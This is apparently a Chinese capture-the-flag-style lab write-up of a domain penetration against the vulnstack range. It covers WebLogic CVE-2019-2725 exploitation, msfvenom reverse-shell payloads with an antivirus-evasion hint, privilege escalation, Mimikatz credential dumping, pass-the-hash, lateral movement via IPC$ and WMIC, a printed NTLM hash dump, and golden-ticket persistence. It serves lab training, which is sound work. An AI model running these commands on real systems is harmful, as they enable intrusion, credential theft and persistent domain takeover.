环境准备
靶场环境:http://vulnstack.qiyuanxuetang.net/vuln/detail/3/
修改网卡
- Windows下打开虚拟网卡编辑器,将NAT网卡修改为
111
网段 - Mac下需要先关闭虚拟机,再修改网卡
# 修改networking配置文件
# 修改VNET_8_HOSTONLY_SUBNET这一行为192.168.111.0
$ sudo vim /Library/Preferences/VMware\ Fusion/networking
# 配置网络
$ sudo /Applications/VMware\ Fusion.app/Contents/Library/vmnet-cli --configure
# 启动网络服务
$ sudo /Applications/VMware\ Fusion.app/Contents/Library/vmnet-cli --start
# 验证
$ ifconfig
账号密码
默认密码:
1qaz@WSX
- de1ayadministrator,后面密码改为
Naraku@123
- de1aymssql
- de1ayde1ay
- de1ayadministrator,后面密码改为
IP | 备注 | |
---|---|---|
Kali | 192.168.111.2 | 攻击机 |
WEB | 192.168.111.80 | |
10.10.10.80 | Web服务器 | |
PC | 192.168.111.201 | |
10.10.10.201 | 域内主机 | |
DC | 10.10.10.10 | 域控 |
服务启动
WEB机:
- 使用
de1ay\administrator
用户登录,提示密码过期,修改为Naraku@123
并登录 - 打开
C:\Oracle\Middleware\user_projects\domains\base_domain\bin\
,以管理员身份运行startWeblogic
- 使用
WEB、PC和DC:
- 使用
de1ay\administrator
用户登录 计算机右键 > 管理 > 配置 > 服务,启动
Server、Workstation、Computer Browser
Computer Browser
默认是禁用的,需要启动,否则查询不到域信息
- 使用
外网打点
Nmap扫描
- 先对Web服务器进行扫描
$ nmap -T4 -sC -sV 192.168.111.80
- 发现存在Weblogic(7001)服务,版本10.3.6.0
Weblogic反序列化
- 这里使用rabbitmask/WeblogicScan对Weblogic服务进行漏洞扫描,发现存在CVE-2019-2725
$ python3 WeblogicScan.py -u 192.168.111.80 -p 7001
- 上线的方法有很多,但是有时候被拦截有时候不拦,多试下吧,玄学...
MSF
- 使用MSF的
exploit/multi/misc/weblogic_deserialize_asyncresponseservice
模块也可以,但需要将默认unix
的targets
改成Windows
msf6 > use exploit/multi/misc/weblogic_deserialize_asyncresponseservice
msf6 exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > set LHOST 192.168.111.2
msf6 exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > set RHOST 192.168.111.80
msf6 exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > set RPORT 7001
msf6 exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > set target 1
msf6 exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > run
GUI工具
- 利用GUI工具一把梭,上传冰蝎马
- 然后MSF或者CS上线:
构造POST包
- MSF监听
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 192.168.111.2
msf6 exploit(multi/handler) > set LPORT 9999
msf6 exploit(multi/handler) > run
- MsfVenom生成ShellCode
$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.111.2 LPORT=9999 -f psh-cmd > shell.ps1
- 可以利用Invoke-Obfuscation工具对ShellCode进行免杀
- 下载exploit.py脚本,将其中的
exploit
变量替换为ShellCode,然后执行
$ python exploit.py http://192.168.111.80:7001/_async/AsyncResponseServiceHttps
CS-MSF联动
不管前面上线了哪个工具,都可以传给另一个
MSF传给CS
- 通过
payload_inject
将Shell发给CS
msf6 exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > use exploit/windows/local/payload_inject
msf6 exploit(windows/local/payload_inject) > set payload windows/meterpreter/reverse_http
msf6 exploit(windows/local/payload_inject) > set LHOST 192.168.111.2
msf6 exploit(windows/local/payload_inject) > set LPORT 10080
msf6 exploit(windows/local/payload_inject) > set session 1
msf6 exploit(windows/local/payload_inject) > set disablepayloadhandler true
msf6 exploit(windows/local/payload_inject) > run
CS传给MSF
- MSF开始监听
# 配置监听器
msf> use exploit/multi/handler
# 选择Payload
msf> set payload windows/meterpreter/reverse_http # 不要用x64
msf> set LHOST <MSF_IP>
msf> set LPORT <MSF_Port> # 设置任意端口进行监听
# 启动监听器
msf> run
然后在CS上设置一个Foreign监听器
- IP为MSF的监听IP
- 端口为MSF监听端口
内网渗透
权限提升
- 利用CS梼杌中的
MS15-051
进行提权
- 将Beacon派生给MSF
# MSF监听
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_http
msf6 exploit(multi/handler) > set LHOST 192.168.111.2
msf6 exploit(multi/handler) > set LPORT 9999
msf6 exploit(multi/handler) > run
信息收集
获取凭证
获取凭证:
- 右键 > Access > Dump Hashes(需要Administrator权限)
- 右键 > Access > Run Mimikatz
域内信息
$ ipconfig /all
$ net config workstation # 当前登录域
$ netsh advfirewall set allprofiles state off # 关闭防火墙
$ net time /domain # Ping获取域控IP
$ nltest /dsgetdc:<domain_name> # 也可以获取域控IP
$ net view /domain
$ nei view # 域内主机
$ net user /domain # 域内用户
$ net group "domain admins" /domain # 域管理员
$ net group "domain controllers" /domain # 域控
横向移动
PTH
# pth <Domain>\<User> <NTLM Hash>
beacon> pth WEB\de1ay 161cff084477fe596a5db81874498a24
IPC
- MSF生成木马文件
$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.10.80 LPORT=8888 -f exe > payload.exe
- 上传到WEB跳板机(10.10.10.80),这里放到
C:\
- 建立IPC连接,并上传木马文件到DC机(10.10.10.10)
beacon> shell net use \\10.10.10.10\ipc$ Naraku@123 /user:administrator
beacon> shell copy c:\payload.exe \\10.10.10.10\c$\windows\temp\payload.exe
- MSF添加路由并监听
meterpreter > run post/multi/manage/autoroute
msf6 exploit(multi/handler) > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 10.10.10.80
msf6 exploit(multi/handler) > set LPORT 8888
msf6 exploit(multi/handler) > exploit
- WMIC调用命令执行木马文件
beacon> shell wmic /node:10.10.10.10 /user:administrator /password:Naraku@123 process call create "C:\Windows\Temp\payload.exe"
psexec
命令:
portscan <IP网段> 445 <protocol>(arp/icmp/none) <Threads>
$ portscan 10.10.10.0/24 445 arp 100
新建一个Listener,Payload选择
Beacon SMB
- CS3.x中选择
windows/beacon_smb/bind_pipe
- CS3.x中选择
- 然后点击
View > Targets
,右键点击DC,Jump > exec
,选择对应的凭证以及前面新建的SMB Listeners
权限维持
- 在DC上
Dump Hash
,获得krbtgt
用户的NTLM Hash
,即KDC Hash
# NTLM Hash
Administrator:500:aad3b435b51404eeaad3b435b51404ee:7ccedbc8e803aff218a8d219301f5bd9:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:82dfc71b72a11ef37d663047bc2088fb:::
de1ay:1001:aad3b435b51404eeaad3b435b51404ee:161cff084477fe596a5db81874498a24:::
mssql:2103:aad3b435b51404eeaad3b435b51404ee:161cff084477fe596a5db81874498a24:::
DC$:1002:aad3b435b51404eeaad3b435b51404ee:4e675b9c9a82832e4767553d30c6e803:::
PC$:1105:aad3b435b51404eeaad3b435b51404ee:27f4d3d984a24e3dc5c84fa08617bc31:::
WEB$:1603:aad3b435b51404eeaad3b435b51404ee:51023470cd27dd6bf0137b8a8335c3d0:::
- 获取
SID
beacon> logonpasswords
# S-1-5-21-2756371121-2868759905-3853650604-500
黄金票据
黄金票据可以在拥有普通域用户权限和KRBTGT账号的哈希的情况下用来获取域管理员权限,上面已经获得域控的 system 权限了,还可以使用黄金票据做权限维持。当域控权限掉后,通过域内其他任意机器伪造票据重新获取最高权限。
- 利用:右键WEB机 > Access > Golden Ticket
版权属于:Naraku
本文链接:https://www.naraku.cn/posts/108.html
本站所有原创文章均采用 知识共享署名-非商业-禁止演绎4.0国际许可证 。如需转载请务必注明出处并保留原文链接,谢谢~